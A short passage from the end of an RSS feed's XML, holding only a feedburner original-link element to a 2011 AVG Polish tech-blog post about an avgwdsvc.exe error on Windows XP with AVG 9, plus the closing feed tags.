		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/05/blad-avgwdsvc-exe-na-windows-xp-przy-avg9/</feedburner:origLink></item>
	</channel>
</rss>

